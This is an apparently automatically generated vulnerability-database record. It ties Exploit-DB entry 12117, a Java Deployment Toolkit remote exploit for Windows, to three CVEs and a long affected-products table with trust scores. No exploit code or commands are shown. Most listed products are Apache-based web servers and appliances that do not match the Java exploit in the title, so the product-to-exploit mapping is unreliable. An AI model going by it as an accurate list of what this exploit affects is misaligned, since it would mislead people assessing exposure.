ID
VAR-E-201004-1922
CVE
cve_id: | CVE-2010-0886 | Trust: 1.0 |
cve_id: | CVE-2012-0053 | Trust: 0.8 |
cve_id: | CVE-2011-3368 | Trust: 0.3 |
EDB ID
12117
TITLE
Java Deployment Toolkit - Performs Insufficient Validation of Parameters - Windows remote Exploit
Trust: 1.0
DESCRIPTION
Java Deployment Toolkit - Performs Insufficient Validation of Parameters. CVE-2010-0886CVE-63798 . remote exploit for Windows platform
Trust: 1.0
AFFECTED PRODUCTS
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-03 | Trust: 1.8 |
vendor: | hitachi | model: | web server 02-04-/a | scope: | - | version: | - | Trust: 1.5 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-02 | Trust: 1.2 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-01 | Trust: 1.2 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.1 | Trust: 1.2 |
vendor: | java | model: | deployment toolkit | scope: | - | version: | - | Trust: 1.0 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.2 | Trust: 0.9 |
vendor: | hitachi | model: | web server 01-02-/c | scope: | - | version: | - | Trust: 0.9 |
vendor: | hitachi | model: | web server 01-02-/b | scope: | - | version: | - | Trust: 0.9 |
vendor: | hitachi | model: | web server 01-02-/a | scope: | - | version: | - | Trust: 0.9 |
vendor: | ubuntu | model: | linux lts sparc | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts powerpc | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts lpia | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 8.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 11.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 11.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.10 | Trust: 0.6 |
vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.04 | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 -current | scope: | - | version: | - | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.37 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.37 | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.1 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.1 | Trust: 0.6 |
vendor: | slackware | model: | linux x86 64 | scope: | eq | version: | 13.0 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 13.0 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.2 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.1 | Trust: 0.6 |
vendor: | slackware | model: | linux | scope: | eq | version: | 12.0 | Trust: 0.6 |
vendor: | slackware | model: | linux -current | scope: | - | version: | - | Trust: 0.6 |
vendor: | redhat | model: | enterprise linux desktop workstation client | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.6 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2011 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2011 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake x86 64 | scope: | eq | version: | 2010.1 | Trust: 0.6 |
vendor: | mandriva | model: | linux mandrake | scope: | eq | version: | 2010.1 | Trust: 0.6 |
vendor: | mandrakesoft | model: | enterprise server x86 64 | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | mandrakesoft | model: | enterprise server | scope: | eq | version: | 5 | Trust: 0.6 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.3 | Trust: 0.6 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | hitachi | model: | web server linux | scope: | eq | version: | 04-00 | Trust: 0.6 |
vendor: | hitachi | model: | web server linux | scope: | eq | version: | 03-00 | Trust: 0.6 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-00 | Trust: 0.6 |
vendor: | hitachi | model: | web server 02-04-/b | scope: | - | version: | - | Trust: 0.6 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-04 | Trust: 0.6 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 01-02 | Trust: 0.6 |
vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 9.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 9.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition b | scope: | eq | version: | 9.1.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio enterprise edition b | scope: | eq | version: | 9.1.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage job workload server | scope: | eq | version: | 8.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage business application server enterprise | scope: | eq | version: | 8.0.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 7.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition 6.0a | scope: | - | version: | - | Trust: 0.6 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition a | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.2 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0.1 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | debian | model: | linux sparc | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux s/390 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux powerpc | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux mips | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux ia-64 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux ia-32 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux arm | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | debian | model: | linux amd64 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.1.2 | Trust: 0.6 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.1.1 | Trust: 0.6 |
vendor: | avaya | model: | voice portal sp1 | scope: | eq | version: | 5.1 | Trust: 0.6 |
vendor: | avaya | model: | voice portal sp2 | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | avaya | model: | voice portal sp1 | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | avaya | model: | voice portal | scope: | eq | version: | 5.0 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 8.0 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 7.0 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | ip office application server | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1.3 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp2 | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp1 | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp1 | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp2 | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager sp1 | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 1.1 | Trust: 0.6 |
vendor: | avaya | model: | aura session manager | scope: | eq | version: | 1.0 | Trust: 0.6 |
vendor: | avaya | model: | aura messaging | scope: | eq | version: | 6.0.1 | Trust: 0.6 |
vendor: | avaya | model: | aura messaging | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura experience portal | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager utility services | scope: | eq | version: | 6.2 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager utility services | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager utility services | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 6.0.1 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 6.0 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2.1 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 6.1.1 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 6.1 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2.3 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2.2 | Trust: 0.6 |
vendor: | avaya | model: | aura application enablement services | scope: | eq | version: | 5.2 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.3 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.2 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.1 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7 | Trust: 0.6 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.6.8 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.4 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.3 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.2 | Trust: 0.6 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.1 | Trust: 0.6 |
vendor: | avaya | model: | aura communication manager | scope: | eq | version: | 4.0 | Trust: 0.6 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2 | Trust: 0.6 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3 | Trust: 0.6 |
vendor: | apache | model: | protocol.c cookie | scope: | - | version: | - | Trust: 0.5 |
vendor: | xerox | model: | freeflow print server 73.c0.41 | scope: | - | version: | - | Trust: 0.3 |
vendor: | xerox | model: | freeflow print server 73.b3.61 | scope: | - | version: | - | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server for vmware sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise server sp4 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sdk sp1 | scope: | eq | version: | 11 | Trust: 0.3 |
vendor: | suse | model: | linux enterprise sdk sp4 | scope: | eq | version: | 10 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | eq | version: | 3.8.1 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | eq | version: | 3.8.0 | Trust: 0.3 |
vendor: | sophos | model: | web appliance | scope: | eq | version: | 3.7.9 | Trust: 0.3 |
vendor: | redhat | model: | jboss enterprise web server for rhel | scope: | eq | version: | 61.0 | Trust: 0.3 |
vendor: | redhat | model: | jboss enterprise web server for rhel server | scope: | eq | version: | 51.0 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop optional | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop | scope: | eq | version: | 6 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux desktop client | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | redhat | model: | enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | juniper | model: | nsmexpress | scope: | eq | version: | - | Trust: 0.3 |
vendor: | juniper | model: | nsm3000 | scope: | eq | version: | - | Trust: 0.3 |
vendor: | juniper | model: | network and security manager software | scope: | eq | version: | 2012.2- | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 12.3 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 12.2 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 12.1 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 11.3 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | juniper | model: | junos space | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.20 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.1.0 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.0.5 | Trust: 0.3 |
vendor: | ibm | model: | storwize unified | scope: | eq | version: | v70001.3.0.0 | Trust: 0.3 |
vendor: | hp | model: | xp provisioning manager | scope: | eq | version: | 5.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | xp p9000 command view advanced edition | scope: | eq | version: | 7.4.0-00 | Trust: 0.3 |
vendor: | hp | model: | xp p9000 command view advanced edition | scope: | eq | version: | 7.3.1-00 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 7.1 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | hp | model: | p9000 tiered storage manager | scope: | eq | version: | 5.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication monitor | scope: | eq | version: | 6.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication monitor | scope: | eq | version: | 5.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | p9000 replication manager | scope: | eq | version: | 6.0.0-00 | Trust: 0.3 |
vendor: | hp | model: | onboard administrator | scope: | eq | version: | 3.55 | Trust: 0.3 |
vendor: | hp | model: | onboard administrator | scope: | eq | version: | 3.50 | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.31 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10-03(x64) | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10-01(x64) | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-00-060 | Trust: 0.3 |
vendor: | hitachi | model: | web server security enhancement 02-04-/b | scope: | eq | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10-03 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-10-02 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-10-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-00-05 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-00-04 | Trust: 0.3 |
vendor: | hitachi | model: | web server solaris | scope: | eq | version: | 04-00-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 04-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 04-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server aix | scope: | eq | version: | 04-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-10-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-10-09 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-10 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-00-05 | Trust: 0.3 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 03-00-02 | Trust: 0.3 |
vendor: | hitachi | model: | web server hp-ux | scope: | eq | version: | 03-00-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 03-00-01 | Trust: 0.3 |
vendor: | hitachi | model: | web server windows | scope: | eq | version: | 03-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server solaris | scope: | eq | version: | 03-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server aix | scope: | eq | version: | 03-00 | Trust: 0.3 |
vendor: | hitachi | model: | web server | scope: | eq | version: | 02-05 | Trust: 0.3 |
vendor: | hitachi | model: | web server 02-04-/c | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server 02-04-/a (windows(ip | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | web server ) | scope: | eq | version: | 02-04 | Trust: 0.3 |
vendor: | hitachi | model: | web server ) | scope: | eq | version: | 02-03 | Trust: 0.3 |
vendor: | hitachi | model: | web server 01-02-/d | scope: | - | version: | - | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus developer no version | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus application server no version | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | hitachi | model: | cosminexus | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.3.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | firepass | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | f5 | model: | firepass | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.40 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf1 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics 11.0.0-hf2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.0.0 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.4 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.3 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.2 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.1.1 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | f5 | model: | arx | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | avaya | model: | aura messaging | scope: | eq | version: | 6.1 | Trust: 0.3 |
vendor: | apple | model: | mac os server | scope: | eq | version: | x10.7.5 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.7 | Trust: 0.3 |
vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.8 | Trust: 0.3 |
